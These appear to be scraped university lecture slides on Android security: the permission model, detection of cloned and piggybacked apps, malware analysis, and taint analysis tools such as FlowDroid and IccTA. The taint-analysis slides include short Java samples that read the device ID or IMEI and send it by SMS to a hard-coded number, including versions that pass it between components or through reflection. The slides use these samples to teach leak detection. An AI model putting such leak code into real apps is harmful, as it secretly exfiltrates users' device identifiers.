程序代写代做代考 game Java graph android file system algorithm C FIT5003 Software Security

FIT5003 Software Security
Mobile Security II
1

Android Permission System
 activity
 restricts access to the activity
 checked when starting activity
 throw SecurityException if caller does not have required permission
 service
 restricts who can start, stop or bind to the service
 receiver
 restricts who can send broadcasts to the BroadcastReceiver  checked at delivery, after broadcast was sent
 does not throw exception in case of permission failure
 provider
 restrict who can access the data
 read and write permissions
 checked when performing operations(e.g. query, insert)
2

Android Permission System
 Android Framework Security
 Mandatory Access Control(MAC) enforced by middleware
 Components protected using access permission labels  declared in the AndroidManifest file
 can not be changed after installation
 4 protection levels
 normal – always granted
 dangerous – requires user approval
 signature – matching certificate
 signature or system – matching certificate with system
image
3

Android Permission System
 At install-time each application requests a list of permissions
 All permissions must be granted at install time – all or nothing
 Protect access to Android components, services and APIs, e.g API for access to phone’s hardware
 ∼130 API-defined permissions in Manifest.Permissions class
 Custom-defined permissions by developers
 name conflicts may appear
 current research on Android permissions doesn’t take them into
consideration
4

Examples of Permissions
– INTERNET (string: “android.permission.INTERNET”)
5

Examples of Permissions
– INTERNET (string: “android.permission.INTERNET”)
– ACCESS_NETWORK_STATE, ACCESS_WIFI_STATE, CHANGE_NETWORK_STATE, READ_PHONE_STATE
– ACCESS_COARSE_LOCATION, ACCESS_FINE_LOCATION
– READ_SMS, RECEIVE_SMS, SEND_SMS
– ANSWER_PHONE_CALLS, CALL_PHONE, READ_CALL_LOG, WRITE_CALL_LOG
– READ_CONTACTS, WRITE_CONTACTS
– READ_CALENDAR, WRITE_CALENDAR
– READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE
– RECORD_AUDIO, CAMERA
– BLUETOOTH, NFC
– RECEIVE_BOOT_COMPLETED
– SYSTEM_ALERT_WINDOW
– SET_WALLPAPER
6

{READ,WRITE}_EXTERNAL_STORAGE
– Each app has access to a private directory – No other apps can access this directory *
– The device offers an “external storage” – In the past: physical “removable” SD Card
– Currently: part of the file system that apps can use to share files – “/sdcard”
7

RECEIVE_BOOT_COMPLETED
– When the system boots, it broadcasts an Intent with the “ACTION_BOOT_COMPLETED” action
– An app can declare an intent filter for this intent so that it can automatically start at boot!
– Useful to gain persistence / survive reboots
– And that’s why the Android folks added a permission requirement
– Note: the app needs to be manually started to receive it
8

SYSTEM_ALERT_WINDOW
– Draw arbitrary windows/overlays on top of other apps – Can be completely custom: position, shape, content, transparency – Can be clickable ⊕ passthrough
– It leads to many UI attacks
– UI confusion, clickjacking, phishing – Teaser: Cloak & Dagger
9

Permission Granting
– Normal permissions
– no explicit granting necessary
– Dangerous permissions – The user needs to be asked
– Signature permissions
– It depends
– Granted at install time when app is signed by same certificate of defining app – Otherwise, the user is asked
– Not all of these are available to third-party apps
10

Permission Request






11

Custom Permissions (doc)
– Apps can define “custom” permissions!
– The “system” permissions are defined in the same way – AndroidManifest.xml
12

Components Permission Enforcement
– Apps’ components can specify which permissions are required to use them





13

Android Permission System
 Are users paying attention to the permissions?  Do users understand the permissions?
 Can users make correct security decisions?
Stowaway Bartel et al. PScout
[1] Felt, Adrienne Porter, Erika Chin, Steve Hanna, Dawn Song, and David Wagner. “Android permissions demystified.” In Proceedings of the 18th ACM conference on Computer and communications security (CCS 2011), pp. 627-638. ACM, 2011.
[2] Kathy Wain Yee Au, Yi Fan Zhou, Zhen Huang and David Lie. PScout: Analyzing the Android Permission Specification . In the Proceedings of the 19th ACM Conference on Computer and Communications Security (CCS 2012). 2012
Analyzing Android , in IEEE Transactions of Software Engineering (TSE), 2014
[3] Alexandre Bartel, Jacques Klein, Martin Monperrus, Yves Le Traon: Static Analysis for Extracting Permission Checks of a Large Scale Framework: The Challenges And Solutions for
14

Android Permission System
15

Android Permission System
16

Identifying Mobile Security Issues
17

Mobile Security
Static Analysis Dynamic
Analysis
Tan, Darell JJ, Tong-Wei Chua, and Vrizlynn LL Thing. “Securing android: a survey, taxonomy, and challenges.” ACM Computing Surveys (CSUR) 47, no. 4 (2015): 58.
18

Mobile Security
STRIDE
A Taxonomy and Qualitative Comparison of Program Analysis Techniques for Security Assessment of Android Software
Alireza Sadeghi, Hamid Bagheri, Joshua Garcia, and Sam Malek
IEEE Transactions on Software Engineering (TSE), Vol. 43, Issue 6, June 2017
19

Mobile Security
20

Mobile Security
 Clone Detection  Malware Analysis  Privacy Leak
21

Clone Detection
Original App
Carrier
Hook
Malicious Piggybacked Payload App
Rider
Wu Zhou, Yajin Zhou, Michael Grace, Xuxian Jiang, and Shihong Zou. Fast, scalable detection of “piggybacked” mobile applications. In CODASPY ’13, pages 185–196, New York, NY, USA, 2013
22

Clone Detection
 Cloning is the process of building a software by re- verse engineering another software or by re-implementing it based on documentation or usage experience.
 Repackaging refers to the core process of unpacking a soft- ware package, then repackaging it after a probable modification of the decompiled code and/or of other resource files (e.g. logos, Permission list, etc.).
 Piggybacking is defined in the literature as a malware development activity where a given benign app is repackaged to include a malicious payload. Piggybacked apps thus constitute a subset of repackaged apps.
23

Clone Detection
 Similarity Comparison
 Symptom Discovery
 (Un)Supervised Learning  Runtime Monitoring
24

Clone Detection
Similarity Computation Algorithms
25

Clone Detection
Plugin-based Framework
Li, Li, Tegawendé F. Bissyandé and Jacques Klein. “SimiDroid: Identifying and Explaining Similarities in Android Apps.” 2017 IEEE Trustcom/BigDataSE/ICESS (2017): 136-143.
26
https://github.com/lilicoding/SimiDroid

Clone Detection
Method Component Resource
27

Clone Detection
 identical: both key and value are exactly the same  similar: same key but different value
 new: key is new
 deleted: key is deleted
28

Clone Detection
Symptom Discovery
Symptom Discovery builds on the intuitive assumption that repackaging processes leave marks on the repackaged apps. If such marks can be fully characterized, it is possible to spot the symptoms in apps.
AndroidSOO has recently introduced and explored a novel and easily extractable attribute called String Offset Order, which is extracted from string identifiers list in the classes.dex bytecode file.
29

Clone Detection
(Un)Supervised Learning
30

Clone Detection
Watermarking Birthmarking
Runtime Monitoring
31

Clone Detection
Detecting Clone Apps Understanding Cloning in Android
32

Clone Detection
(1) Constant String Replacement.
class Start extends Activity { void callAdds() {
$r1 = $r0.;
-virtualinvoke $r1.setAdUnitId(“a1522d5c390a573″);
+ virtualinvoke $r1.setAdUnitId(String)(” ca-app-pub-8182614411920503/1232098473”);
}}
33

Clone Detection
(1) Constant String Replacement. (2) New Method Call.
class UnityPlayerProxyActivity extends Activity { protected void onCreate(Bundle) {
specialinvoke $r0.onCreate($r1);
+ staticinvoke ($r0);
}}$r2 = newarray (java.lang.String)[2];
34

Clone Detection
 (1) Constant String Replacement.  (2) New Method Call.
 (3) Library Impact.
35

Clone Detection
 (1) Constant String Replacement.  (2) New Method Call.
 (3) Library Impact.
36

Clone Detection
(1) Constant String Replacement. (2) New Method Call.
(3) Library Impact.
(4) Duplicated Component Capabilities.
receiver: “com.kuguo.ad.MainReceiver” intent-filter
action: “android.net.conn.CONNECTIVITY_CHANGE”
receiver: “net.crazymedia.iad.AdPushReceiver” intent-filter
action: “android.net.conn.CONNECTIVITY_CHANGE”
37

Malware Analysis
38

Malware Analysis
39

Malware Analysis
40

Malware Analysis
41

Malware Analysis
Machine Learning-based Malware Detection
42

Malware Analysis
Example: CHABADA
43

Malware Analysis
Example: CHABADA
44

Malware Analysis
Example: CHABADA
45

Privacy Leak
46

Privacy Leak
Taint Analysis
source
sink
47

Privacy Leak
public class Activity_A { void onCreate(Bundle b) {
String id = telManager.getDeviceId(); //…
String alias = id;
String number = “+3524666445556”;
}}sms.sendTextMessage(number, null, alias, null, null);
source
sink
48

Privacy Leak
FlowDroid: Precise Context, Flow, Field, Object-sensitive and Lifecycle-aware Taint Analysis for Android Apps
 Multiple Entrypoints  Callback methods
49

Privacy Leak
Multiple Entrypoints
Main Launcher
50

Privacy Leak
Callback methods
51

Privacy Leak
Callback methods
52

Privacy Leak
Dummy main methods
53

Privacy Leak
54

Privacy Leak
55

Privacy Leak
Static Taint Analysis
Build Sound Call Graph
56

Privacy Leak
APP
Activity_A
ICC Method
startActivity()
Android Framework
Activity_B
57

Privacy Leak
Activity_A Activity_B
58

Activity_A
String id = telManager.getDeviceId();
Intent intent = new Intent(this, Activity_B.class); intent.putExtra(“sensitive”, id); startActivity(intent)
Activity_B
Broken Call Graph (CFG)
void onCreate(Bundle b) {
Intent intent = getIntent();
String id = intent.getStringExtra(“sensitive”); String number = “+3524666445556”; sms.sendTextMessage(number, null, id, null, null);
}
source
sink
59

Privacy Leak
IccTA
ICC Links Building
Call Graph Bridging
Resolving Intent Values
Activity_A {
Intent: {
} targetcomp:Activity_B
60
Constant String Propagation

Privacy Leak
IccTA
ICC Links Building
Activity_A
– startActivity(intent);
Call Graph Bridging
ICC link
Activity_B
void dummyMain() {
Intent i = getIntent() //Lifecycle/Callback methods }
+ Activity_B a2 = new Activity_B(intent);
+ a2.dummyMain();
61

Privacy Leak
Activity_A ICC link
– startActivity(intent);
+ a2.dummyMain();
Activity_B
void dummyMain() {
Intent i = getIntent() //Lifecycle/Callback methods }
+ Activity_B a2 = new Activity_B(intent);
private Intent intent = null;
public Activity_B(Intent intent) {
this.intent = i;}
@override
public Intent getIntent() {
return this.intent;}
62

Privacy Leak
Inter-Component Call Graph
63

Privacy Leak
APP
Activity_A
Reflective Method
Reflective Method
ICC Method
startActivity()
Activity_B
64

Privacy Leak
String imei = telephonyManager.getDeviceId();
Class c = Class.forName(“de.ecspride.ReflectiveClass”); Object o = c.newInstance();
Method m = c.getMethod(“setIme” + “i”, String.class); m.invoke(o, imei);
Method m2 = c.getMethod(“getImei”);
String s = (String) m2.invoke(o);
SmsManager sms = SmsManager.getDefault();
sms.sendTextMessage(“+49 1234”, null, s, null, null);
source
sink
65

Privacy Leak
DroidRA
1) Toinfertargetvaluesofreflectivecalls.
m.invoke(o, imei);  //o.setImei(imei);
2) ToreplacereflectivecallswithtraditionalJavacalls
66